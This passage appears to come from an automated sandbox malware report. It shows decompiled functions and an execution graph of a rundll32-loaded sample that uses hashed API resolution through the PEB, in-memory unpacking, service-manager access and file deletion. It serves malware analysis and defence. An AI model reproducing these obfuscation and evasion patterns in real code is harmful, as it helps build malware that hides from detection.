                                                                                                          				E04CBEB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
                                                                                                          				_t37 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                          				return _t37;
                                                                                                          			}









                                                                                                          0x04cce8bd
                                                                                                          0x04cce8c2
                                                                                                          0x04cce8c5
                                                                                                          0x04cce8c6
                                                                                                          0x04cce8ca
                                                                                                          0x04cce8cb
                                                                                                          0x04cce8d0
                                                                                                          0x04cce8da
                                                                                                          0x04cce8e1
                                                                                                          0x04cce8e8
                                                                                                          0x04cce8ef
                                                                                                          0x04cce8f3
                                                                                                          0x04cce8fa
                                                                                                          0x04cce901
                                                                                                          0x04cce908
                                                                                                          0x04cce90f
                                                                                                          0x04cce92a
                                                                                                          0x04cce92d
                                                                                                          0x04cce941
                                                                                                          0x04cce94e
                                                                                                          0x04cce954

                                                                                                          APIs
                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 04CCE94E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ManagerOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1889721586-0
                                                                                                          • Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                          • Instruction ID: a87dc6068cc2284c8dcf038be92c8d523fda116cec3f90f56502de6b1a1a4a51
                                                                                                          • Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                          • Instruction Fuzzy Hash: 8D11F77190221DFB9B04EFE99D468DFBFB4FF04308F118598E925B2211D3B19B149B95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04CCD11A() {
                                                                                                          				unsigned int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				signed int _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				intOrPtr _v32;
                                                                                                          				intOrPtr _v36;
                                                                                                          				void* _t39;
                                                                                                          
                                                                                                          				_v24 = _v24 & 0x00000000;
                                                                                                          				_v36 = 0x78f5c7;
                                                                                                          				_v32 = 0xa12bb9;
                                                                                                          				_v28 = 0x4eca09;
                                                                                                          				_v8 = 0x8b256f;
                                                                                                          				_v8 = _v8 << 0xb;
                                                                                                          				_v8 = _v8 ^ 0x4a7d0011;
                                                                                                          				_v8 = _v8 >> 9;
                                                                                                          				_v8 = _v8 ^ 0x00073d60;
                                                                                                          				_v20 = 0x1e549a;
                                                                                                          				_v20 = _v20 + 0xffffad33;
                                                                                                          				_v20 = _v20 ^ 0x00134b4f;
                                                                                                          				_v16 = 0x8dd9dd;
                                                                                                          				_v16 = _v16 << 3;
                                                                                                          				_v16 = _v16 ^ 0x0460bc3c;
                                                                                                          				_v12 = 0x358059;
                                                                                                          				_v12 = _v12 + 0xb97b;
                                                                                                          				_v12 = _v12 ^ 0x003502df;
                                                                                                          				E04CBEB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
                                                                                                          				ExitProcess(0);
                                                                                                          			}












                                                                                                          0x04ccd120
                                                                                                          0x04ccd124
                                                                                                          0x04ccd12b
                                                                                                          0x04ccd132
                                                                                                          0x04ccd139
                                                                                                          0x04ccd140
                                                                                                          0x04ccd144
                                                                                                          0x04ccd14b
                                                                                                          0x04ccd14f
                                                                                                          0x04ccd156
                                                                                                          0x04ccd15d
                                                                                                          0x04ccd164
                                                                                                          0x04ccd16b
                                                                                                          0x04ccd172
                                                                                                          0x04ccd176
                                                                                                          0x04ccd17d
                                                                                                          0x04ccd184
                                                                                                          0x04ccd18b
                                                                                                          0x04ccd1ac
                                                                                                          0x04ccd1b6

                                                                                                          APIs
                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 04CCD1B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 621844428-0
                                                                                                          • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                          • Instruction ID: b4062a3a4f8bfb37765e8edd8a0e1385e9662a273d174eeda0718207d3cb65fa
                                                                                                          • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                          • Instruction Fuzzy Hash: 5D11E2B1C4430DEBDB54DFE5D94A6DEFBB0EB00749F108588D521B6250D3B89B489F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 79%
                                                                                                          			E04CD061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				signed int _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				void* _t44;
                                                                                                          				int _t53;
                                                                                                          				WCHAR* _t56;
                                                                                                          
                                                                                                          				_push(_a12);
                                                                                                          				_t56 = __edx;
                                                                                                          				_push(_a8);
                                                                                                          				_push(_a4);
                                                                                                          				_push(__edx);
                                                                                                          				_push(__ecx);
                                                                                                          				E04CCFE29(_t44);
                                                                                                          				_v24 = _v24 & 0x00000000;
                                                                                                          				_v28 = 0xcd60b7;
                                                                                                          				_v12 = 0x7257ab;
                                                                                                          				_v12 = _v12 << 0xd;
                                                                                                          				_v12 = _v12 + 0x8f69;
                                                                                                          				_v12 = _v12 * 0x4c;
                                                                                                          				_v12 = _v12 ^ 0x410f7a13;
                                                                                                          				_v8 = 0x7b4696;
                                                                                                          				_v8 = _v8 + 0xffff4950;
                                                                                                          				_v8 = _v8 | 0x2a0f624b;
                                                                                                          				_v8 = _v8 * 0x3a;
                                                                                                          				_v8 = _v8 ^ 0xa0f3ec54;
                                                                                                          				_v20 = 0x8a2161;
                                                                                                          				_v20 = _v20 + 0xffff45ea;
                                                                                                          				_v20 = _v20 ^ 0x1b6c7fa6;
                                                                                                          				_v20 = _v20 ^ 0x1be8dede;
                                                                                                          				_v16 = 0xdcc12a;
                                                                                                          				_v16 = _v16 + 0xb9f4;
                                                                                                          				_v16 = _v16 + 0xffffcfef;
                                                                                                          				_v16 = _v16 ^ 0x00d9de04;
                                                                                                          				E04CBEB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                                                                                                          				_t53 = lstrcmpiW(_a4, _t56); // executed
                                                                                                          				return _t53;
                                                                                                          			}












                                                                                                          0x04cd0624
                                                                                                          0x04cd0627
                                                                                                          0x04cd0629
                                                                                                          0x04cd062c
                                                                                                          0x04cd062f
                                                                                                          0x04cd0630
                                                                                                          0x04cd0631
                                                                                                          0x04cd0636
                                                                                                          0x04cd063d
                                                                                                          0x04cd0644
                                                                                                          0x04cd064b
                                                                                                          0x04cd064f
                                                                                                          0x04cd0667
                                                                                                          0x04cd066a
                                                                                                          0x04cd0671
                                                                                                          0x04cd0678
                                                                                                          0x04cd067f
                                                                                                          0x04cd068b
                                                                                                          0x04cd068e
                                                                                                          0x04cd0695
                                                                                                          0x04cd069c
                                                                                                          0x04cd06a3
                                                                                                          0x04cd06aa
                                                                                                          0x04cd06b1
                                                                                                          0x04cd06b8
                                                                                                          0x04cd06bf
                                                                                                          0x04cd06c6
                                                                                                          0x04cd06d9
                                                                                                          0x04cd06e5
                                                                                                          0x04cd06eb

                                                                                                          APIs
                                                                                                          • lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04CD06E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: lstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 1586166983-0
                                                                                                          • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                          • Instruction ID: 19f7c05df9dbb4f3abaa7dd4b410478c8375cffd7ee5904942d6e50a195c81a7
                                                                                                          • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                          • Instruction Fuzzy Hash: 062110B1C01309EBCF14DFA9D9899DEBFB5FB20354F108298E529A6251D3B49B04DF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04CBF7F7() {
                                                                                                          
                                                                                                          				return  *[fs:0x30];
                                                                                                          			}



                                                                                                          0x04cbf7fd

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:12.4%
                                                                                                          Dynamic/Decrypted Code Coverage:97.6%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:1103
                                                                                                          Total number of Limit Nodes:11

                                                                                                          Graph

                                                                                                          execution_graph 4706 10003160 4709 10002d40 4706->4709 4708 10003188 4711 10002d65 4709->4711 4710 10002e97 GetNativeSystemInfo 4712 10002ee6 VirtualAlloc 4710->4712 4720 10002d69 4710->4720 4711->4710 4711->4720 4713 10002f07 VirtualAlloc 4712->4713 4714 10002f32 4712->4714 4713->4714 4713->4720 4715 10002fdc VirtualAlloc 4714->4715 4714->4720 4716 1000300b 4715->4716 4721 100024d0 4716->4721 4718 1000303f 4718->4720 4725 100027c0 4718->4725 4720->4708 4724 10002500 4721->4724 4722 100025b4 VirtualAlloc 4723 10002560 4722->4723 4723->4718 4724->4722 4724->4723 4726 10002808 4725->4726 4727 10002911 4726->4727 4729 100028ed 4726->4729 4731 10002690 4726->4731 4728 10002690 2 API calls 4727->4728 4728->4729 4729->4720 4732 100026ac 4731->4732 4733 100026a2 4731->4733 4734 10002714 VirtualProtect 4732->4734 4735 100026ba 4732->4735 4733->4726 4734->4733 4735->4733 4737 100026f2 VirtualFree 4735->4737 4737->4733 4738 3516395 4739 351647e 4738->4739 4740 3516453 4738->4740 4744 351efdd 4740->4744 4751 351f548 4744->4751 4748 351f760 4783 35185ff 4748->4783 4749 3516466 4749->4739 4757 351d11a 4749->4757 4751->4748 4751->4749 4754 351e1f8 GetPEB RtlAllocateHeap 4751->4754 4755 351fecb GetPEB 4751->4755 4760 352061d 4751->4760 4764 3501a34 4751->4764 4768 3520db1 4751->4768 4772 3522d0a 4751->4772 4776 351fe2a 4751->4776 4780 350c307 4751->4780 4754->4751 4755->4751 4758 350eb52 GetPEB 4757->4758 4759 351d1b1 ExitProcess 4758->4759 4759->4739 4761 3520636 4760->4761 4793 350eb52 4761->4793 4765 3501a59 4764->4765 4766 350eb52 GetPEB 4765->4766 4767 3501aeb 4766->4767 4767->4751 4769 3520dcc 4768->4769 4823 351bb96 4769->4823 4773 3522d2f 4772->4773 4827 35231aa 4773->4827 4777 351fe3d 4776->4777 4830 350c28c 4777->4830 4781 350eb52 GetPEB 4780->4781 4782 350c39e 4781->4782 4782->4751 4784 3518626 4783->4784 4785 351fe2a GetPEB 4784->4785 4786 351878e 4785->4786 4838 3522c24 4786->4838 4790 35187ec 4791 3521538 2 API calls 4790->4791 4792 35187d2 4791->4792 4792->4749 4794 350ebf7 4793->4794 4798 350ec1b lstrcmpiW 4793->4798 4799 351567b 4794->4799 4796 350ec06 4802 350ec31 4796->4802 4798->4751 4806 350f7f7 GetPEB 4799->4806 4801 351573b 4801->4796 4804 350ec50 4802->4804 4803 350ed2e 4803->4798 4804->4803 4807 3507e79 4804->4807 4806->4801 4808 3507fa7 4807->4808 4815 350801a 4808->4815 4811 3507fe4 4813 3508011 4811->4813 4814 350ec31 GetPEB 4811->4814 4813->4803 4814->4813 4816 350802d 4815->4816 4817 350eb52 GetPEB 4816->4817 4818 3507fcb 4817->4818 4818->4811 4819 350483c 4818->4819 4820 350484c 4819->4820 4821 350eb52 GetPEB 4820->4821 4822 35048d1 4821->4822 4822->4811 4824 351bbbe 4823->4824 4825 350eb52 GetPEB 4824->4825 4826 351bc5c 4825->4826 4826->4751 4828 350eb52 GetPEB 4827->4828 4829 3522d4b 4828->4829 4829->4751 4831 350c2a9 4830->4831 4834 35076e0 4831->4834 4835 35076f8 4834->4835 4836 350eb52 GetPEB 4835->4836 4837 3507793 4836->4837 4837->4751 4839 3522c57 4838->4839 4840 350eb52 GetPEB 4839->4840 4841 35187c7 4840->4841 4841->4792 4842 3521538 4841->4842 4843 3521548 4842->4843 4844 350eb52 GetPEB 4843->4844 4845 352160f FindCloseChangeNotification 4844->4845 4845->4790 6014 351a2a5 6015 351a419 6014->6015 6016 3514244 2 API calls 6015->6016 6021 351a467 6015->6021 6017 351a434 6016->6017 6022 3523560 6017->6022 6020 351fecb GetPEB 6020->6021 6024 352357f 6022->6024 6023 351a44b 6023->6020 6024->6023 6026 351bddd 6024->6026 6027 351bdf6 6026->6027 6028 350eb52 GetPEB 6027->6028 6029 351be7e 6028->6029 6029->6024 6030 35236aa 6040 3523bc2 6030->6040 6031 350c5d8 2 API calls 6031->6040 6032 3522b09 GetPEB 6032->6040 6033 3520db1 GetPEB 6033->6040 6034 3523df0 6035 3521538 2 API calls 6034->6035 6036 3523dee 6035->6036 6037 35109dd GetPEB 6037->6040 6039 35245ca 2 API calls 6039->6040 6040->6031 6040->6032 6040->6033 6040->6034 6040->6036 6040->6037 6040->6039 6041 352061d 2 API calls 6040->6041 6043 351e406 6040->6043 6047 35227bc 6040->6047 6041->6040 6044 351e434 6043->6044 6045 350eb52 GetPEB 6044->6045 6046 351e4c9 6045->6046 6046->6040 6048 35227cf 6047->6048 6049 350eb52 GetPEB 6048->6049 6050 3522873 6049->6050 6050->6040 4846 350f1cb 4851 3508636 4846->4851 4848 350f26d 4849 351d11a 2 API calls 4848->4849 4850 350f281 4849->4850 4875 3509ad5 4851->4875 4852 350a3e5 5101 35127f9 4852->5101 4854 3520e63 GetPEB RtlAllocateHeap 4854->4875 4860 350a3c7 5091 35217bd 4860->5091 4862 350a3c5 4862->4848 4864 3513d85 GetPEB RtlAllocateHeap 4864->4875 4875->4852 4875->4854 4875->4860 4875->4862 4875->4864 4882 3522b09 GetPEB 4875->4882 4884 351fecb GetPEB 4875->4884 4888 3512142 4875->4888 4902 350670b 4875->4902 4910 3522699 4875->4910 4914 350de74 4875->4914 4924 3522009 4875->4924 4935 3514a66 4875->4935 4945 351ad08 4875->4945 4955 350a445 4875->4955 4964 3521028 4875->4964 4968 3514f74 4875->4968 4976 35077a3 4875->4976 4981 35030e7 4875->4981 4986 351bd13 4875->4986 4990 351d1bc 4875->4990 5000 350bdf9 4875->5000 5003 3513eaa 4875->5003 5009 351e955 4875->5009 5020 3504b5d 4875->5020 5023 350c6b8 4875->5023 5036 350d14c 4875->5036 5049 351c5d5 4875->5049 5053 351fbde 4875->5053 5058 351c387 4875->5058 5063 351e4e5 4875->5063 5075 3519a01 4875->5075 5084 3518d3d 4875->5084 4882->4875 4884->4875 4889 3512628 4888->4889 4891 35127af 4889->4891 4893 3512793 4889->4893 4897 350c5d8 GetPEB RtlAllocateHeap 4889->4897 4900 3512791 4889->4900 5115 351e1f8 4889->5115 5119 350738a 4889->5119 5123 3518b9e 4889->5123 5127 351fecb 4889->5127 5135 3522b09 4891->5135 5131 350f7fe 4893->5131 4897->4889 4900->4875 4901 3522b09 GetPEB 4901->4900 4905 3506a16 4902->4905 4904 3520db1 GetPEB 4904->4905 4905->4904 4907 3506b43 4905->4907 4909 3521538 2 API calls 4905->4909 5157 35245ca 4905->5157 5161 351dbc1 4905->5161 5165 351ca1f 4905->5165 4907->4875 4909->4905 4911 35226b3 4910->4911 4912 35227a6 4911->4912 4913 351ff58 LoadLibraryW GetPEB RtlAllocateHeap 4911->4913 4912->4875 4913->4911 4916 350e069 4914->4916 4915 350e1e6 5184 35054b6 4915->5184 4916->4915 4919 350e1e4 4916->4919 4921 3522b09 GetPEB 4916->4921 4923 350c307 GetPEB 4916->4923 5169 3518c7d 4916->5169 5173 351e0f2 4916->5173 5177 351f840 4916->5177 4919->4875 4921->4916 4923->4916 5192 350556b 4924->5192 4926 351e1f8 GetPEB RtlAllocateHeap 4934 3522465 4926->4934 4927 35225bf 5195 351654a 4927->5195 4929 3522d0a GetPEB 4929->4934 4930 35225bd 4930->4875 4931 351fecb GetPEB 4931->4934 4934->4926 4934->4927 4934->4929 4934->4930 4934->4931 5209 350dc1b 4934->5209 5212 35244ad 4934->5212 4939 3514ded 4935->4939 4936 3501a34 GetPEB 4936->4939 4938 350c5d8 2 API calls 4938->4939 4939->4936 4939->4938 4940 3514f25 4939->4940 4944 3514f23 4939->4944 5224 351e8b6 4939->5224 5228 35107f4 4939->5228 5235 3503046 4939->5235 4942 3520db1 GetPEB 4940->4942 4942->4944 4944->4875 4950 351b06a 4945->4950 4946 3520db1 GetPEB 4946->4950 4947 351e1f8 2 API calls 4947->4950 4948 351b173 5243 3517a0f 4948->5243 4949 351654a GetPEB 4949->4950 4950->4946 4950->4947 4950->4948 4950->4949 4951 3522d0a GetPEB 4950->4951 4952 351b171 4950->4952 4954 351fecb GetPEB 4950->4954 4951->4950 4952->4875 4954->4950 4962 350a713 4955->4962 4957 350a84e 4959 3503046 GetPEB 4957->4959 4961 350a84c 4959->4961 4960 351e8b6 2 API calls 4960->4962 4961->4875 4962->4957 4962->4960 4962->4961 4963 3503046 GetPEB 4962->4963 5261 350ee62 4962->5261 5265 3501e9b 4962->5265 4963->4962 4965 3521041 4964->4965 4966 350eb52 GetPEB 4965->4966 4967 35210cd 4966->4967 4967->4875 4973 351522f 4968->4973 4971 3515328 4971->4875 4972 351e1f8 2 API calls 4972->4973 4973->4971 4973->4972 4974 3522d0a GetPEB 4973->4974 4975 351fecb GetPEB 4973->4975 5269 35109dd 4973->5269 5273 351437a 4973->5273 4974->4973 4975->4973 4980 35077cc 4976->4980 4977 351cad5 GetPEB 4977->4980 4978 3507e67 4978->4875 4979 350c5d8 2 API calls 4979->4980 4980->4977 4980->4978 4980->4979 4982 35031a7 4981->4982 4983 350325b 4982->4983 5297 352161b 4982->5297 5301 3522a36 4982->5301 4983->4875 4987 351bd2c 4986->4987 4988 350eb52 GetPEB 4987->4988 4989 351bdd2 4988->4989 4989->4875 4995 351d202 4990->4995 4992 351fe2a GetPEB 4992->4995 4995->4992 4997 351d8c2 4995->4997 4999 3522b09 GetPEB 4995->4999 5305 3506b7a 4995->5305 5313 3515779 4995->5313 5325 35080c0 4995->5325 5335 3512e5d 4995->5335 5353 35167e6 4995->5353 4997->4875 4999->4995 5001 350c5d8 2 API calls 5000->5001 5002 350be8c 5001->5002 5002->4875 5006 3514051 5003->5006 5004 351416b 5004->4875 5005 35109dd GetPEB 5005->5006 5006->5004 5006->5005 5505 350dd35 5006->5505 5508 3510aba 5006->5508 5015 351edaa 5009->5015 5010 35245ca 2 API calls 5010->5015 5011 351efc1 5012 3521538 2 API calls 5011->5012 5013 351efbf 5012->5013 5013->4875 5014 351e1f8 2 API calls 5014->5015 5015->5010 5015->5011 5015->5013 5015->5014 5016 3522d0a GetPEB 5015->5016 5018 351ca1f GetPEB 5015->5018 5019 351fecb GetPEB 5015->5019 5546 35244ff 5015->5546 5016->5015 5018->5015 5019->5015 5021 3521028 GetPEB 5020->5021 5022 3504bf5 5021->5022 5022->4875 5035 350cdac 5023->5035 5024 351e1f8 GetPEB RtlAllocateHeap 5024->5035 5025 35100c5 GetPEB 5025->5035 5029 350cdf0 5550 35053d0 5029->5550 5030 3501a34 GetPEB 5030->5035 5031 350d05c 5031->5031 5033 351fecb GetPEB 5033->5035 5035->5024 5035->5025 5035->5029 5035->5030 5035->5031 5035->5033 5554 3512cd9 5035->5554 5558 3502dea 5035->5558 5562 350f96f 5035->5562 5047 350d807 5036->5047 5037 350da79 5039 3503046 GetPEB 5037->5039 5038 3501a34 GetPEB 5038->5047 5043 350da77 5039->5043 5041 351e8b6 2 API calls 5041->5047 5042 351e1f8 2 API calls 5042->5047 5043->4875 5045 3503046 GetPEB 5045->5047 5046 350f96f GetPEB 5046->5047 5047->5037 5047->5038 5047->5041 5047->5042 5047->5043 5047->5045 5047->5046 5048 351fecb GetPEB 5047->5048 5566 351b257 5047->5566 5579 3517c4e 5047->5579 5048->5047 5052 351c7d3 5049->5052 5050 350dc1b GetPEB 5050->5052 5051 351c8ad 5051->4875 5052->5050 5052->5051 5056 351fcf5 5053->5056 5055 350c5d8 2 API calls 5055->5056 5056->5055 5057 351fd44 5056->5057 5595 3519df5 5056->5595 5057->4875 5059 350556b GetPEB 5058->5059 5060 351c401 5059->5060 5624 351b19c 5060->5624 5064 351e50b 5063->5064 5065 350c5d8 2 API calls 5064->5065 5072 351e8a9 5064->5072 5628 3517d5b 5064->5628 5648 35200ef 5064->5648 5660 350b820 5064->5660 5667 350a871 5064->5667 5688 351ccd9 5064->5688 5696 350238c 5064->5696 5717 351a474 5064->5717 5737 3522d53 5064->5737 5065->5064 5072->4875 5076 3519a1f 5075->5076 5078 3519c42 5076->5078 5081 3519c40 5076->5081 5083 350c5d8 2 API calls 5076->5083 5850 350dca0 5076->5850 5854 3523ee9 5076->5854 5864 3503271 5076->5864 5079 3522b09 GetPEB 5078->5079 5079->5081 5081->4875 5083->5076 5086 3518f0d 5084->5086 5087 350c5d8 2 API calls 5086->5087 5088 3518f1d 5086->5088 5089 3518f3c 5086->5089 5959 35048dd 5086->5959 5087->5086 5090 3510ebc GetPEB 5088->5090 5089->4875 5090->5089 5100 35217de 5091->5100 5092 3521f31 5093 35185ff 2 API calls 5092->5093 5094 3521f2f 5093->5094 5094->4862 5095 3501a34 GetPEB 5095->5100 5096 351e1f8 GetPEB RtlAllocateHeap 5096->5100 5098 351fecb GetPEB 5098->5100 5099 350f96f GetPEB 5099->5100 5100->5092 5100->5094 5100->5095 5100->5096 5100->5098 5100->5099 5963 350bf5f 5100->5963 5110 3512b33 5101->5110 5104 3512c60 5106 35109dd GetPEB 5104->5106 5105 351654a GetPEB 5105->5110 5108 3512c75 5106->5108 5107 351e1f8 2 API calls 5107->5110 5981 350856e 5108->5981 5110->5104 5110->5105 5110->5107 5111 3512c5e 5110->5111 5112 350a445 2 API calls 5110->5112 5113 3522d0a GetPEB 5110->5113 5114 351fecb GetPEB 5110->5114 5967 351dc71 5110->5967 5975 3501ca1 5110->5975 5111->4862 5112->5110 5113->5110 5114->5110 5116 351e211 5115->5116 5141 350c5d8 5116->5141 5118 351e2da 5118->4889 5118->5118 5120 35073a9 5119->5120 5121 350eb52 GetPEB 5120->5121 5122 350742e 5121->5122 5122->4889 5124 3518bc0 5123->5124 5125 350eb52 GetPEB 5124->5125 5126 3518c6a 5125->5126 5126->4889 5128 351fee3 5127->5128 5129 3522b09 GetPEB 5128->5129 5130 351ff4f 5129->5130 5130->4889 5132 350f814 5131->5132 5133 350eb52 GetPEB 5132->5133 5134 350f892 5133->5134 5134->4900 5136 3522b1f 5135->5136 5137 35228eb GetPEB 5136->5137 5138 3522bd9 5137->5138 5153 3510c2a 5138->5153 5146 35228eb 5141->5146 5145 350c6b1 5145->5118 5147 350eb52 GetPEB 5146->5147 5148 350c69c 5147->5148 5149 351648a 5148->5149 5150 35164a6 5149->5150 5151 350eb52 GetPEB 5150->5151 5152 3516539 RtlAllocateHeap 5151->5152 5152->5145 5154 3510c42 5153->5154 5155 350eb52 GetPEB 5154->5155 5156 3510ce9 5155->5156 5156->4901 5158 35245fd 5157->5158 5159 350eb52 GetPEB 5158->5159 5160 35246a3 CreateFileW 5159->5160 5160->4905 5162 351dbe1 5161->5162 5163 350eb52 GetPEB 5162->5163 5164 351dc5f 5163->5164 5164->4905 5166 351ca35 5165->5166 5167 350eb52 GetPEB 5166->5167 5168 351cac9 5167->5168 5168->4905 5170 3518c96 5169->5170 5171 350eb52 GetPEB 5170->5171 5172 3518d2f 5171->5172 5172->4916 5174 351e10e 5173->5174 5175 350eb52 GetPEB 5174->5175 5176 351e19c 5175->5176 5176->4916 5178 351f859 5177->5178 5179 351fb47 5178->5179 5180 351a1c0 GetPEB 5178->5180 5181 351fb19 5178->5181 5182 350c5d8 2 API calls 5178->5182 5179->4916 5180->5178 5188 351a1c0 5181->5188 5182->5178 5185 35054c9 5184->5185 5186 350eb52 GetPEB 5185->5186 5187 350555f 5186->5187 5187->4919 5189 351a1f0 5188->5189 5190 350eb52 GetPEB 5189->5190 5191 351a28c 5190->5191 5191->5179 5193 350eb52 GetPEB 5192->5193 5194 35055f6 5193->5194 5194->4934 5196 3516564 5195->5196 5197 351fe2a GetPEB 5196->5197 5198 3516749 5197->5198 5199 351fe2a GetPEB 5198->5199 5200 3516761 5199->5200 5201 351fe2a GetPEB 5200->5201 5202 3516774 5201->5202 5216 350e204 5202->5216 5205 350e204 GetPEB 5206 351679e 5205->5206 5220 350e4f8 5206->5220 5210 350eb52 GetPEB 5209->5210 5211 350dc97 5210->5211 5211->4934 5213 35244d8 5212->5213 5214 35231aa GetPEB 5213->5214 5215 35244f7 5214->5215 5215->4934 5217 350e217 5216->5217 5218 350eb52 GetPEB 5217->5218 5219 350e2ae 5218->5219 5219->5205 5221 350e511 5220->5221 5222 350eb52 GetPEB 5221->5222 5223 350e5b5 5222->5223 5223->4930 5225 351e8d0 5224->5225 5226 350eb52 GetPEB 5225->5226 5227 351e946 OpenSCManagerW 5226->5227 5227->4939 5234 35108fe 5228->5234 5229 3520db1 GetPEB 5229->5234 5230 35109b5 5230->4939 5231 35109b7 5232 350e204 GetPEB 5231->5232 5232->5230 5234->5229 5234->5230 5234->5231 5239 35100c5 5234->5239 5236 350305c 5235->5236 5237 350eb52 GetPEB 5236->5237 5238 35030db 5237->5238 5238->4939 5240 35100d8 5239->5240 5241 350eb52 GetPEB 5240->5241 5242 3510170 5241->5242 5242->5234 5244 3517a2c 5243->5244 5245 351e1f8 2 API calls 5244->5245 5246 3517bfe 5245->5246 5253 3512c9c 5246->5253 5249 351fecb GetPEB 5250 3517c2e 5249->5250 5257 350d061 5250->5257 5252 3517c45 5252->4952 5254 3512cb8 5253->5254 5255 35231aa GetPEB 5254->5255 5256 3512cd1 5255->5256 5256->5249 5258 350d07a 5257->5258 5259 350eb52 GetPEB 5258->5259 5260 350d141 DeleteFileW 5259->5260 5260->5252 5262 350ee81 5261->5262 5263 350eb52 GetPEB 5262->5263 5264 350eefb 5263->5264 5264->4962 5266 3501eb4 5265->5266 5267 350eb52 GetPEB 5266->5267 5268 3501f2d 5267->5268 5268->4962 5270 35109f3 5269->5270 5271 350eb52 GetPEB 5270->5271 5272 3510a85 5271->5272 5272->4973 5282 35143a8 5273->5282 5276 3514a52 5293 350bea1 5276->5293 5278 3514a50 5278->4973 5279 351e1f8 GetPEB RtlAllocateHeap 5279->5282 5280 3512c9c GetPEB 5280->5282 5281 3522d0a GetPEB 5281->5282 5282->5276 5282->5278 5282->5279 5282->5280 5282->5281 5283 351437a 2 API calls 5282->5283 5284 351fecb GetPEB 5282->5284 5285 3512da7 5282->5285 5289 3520f1e 5282->5289 5283->5282 5284->5282 5286 3512dbd 5285->5286 5287 350eb52 GetPEB 5286->5287 5288 3512e4f 5287->5288 5288->5282 5290 3520f37 5289->5290 5291 350eb52 GetPEB 5290->5291 5292 3520ff6 5291->5292 5292->5282 5294 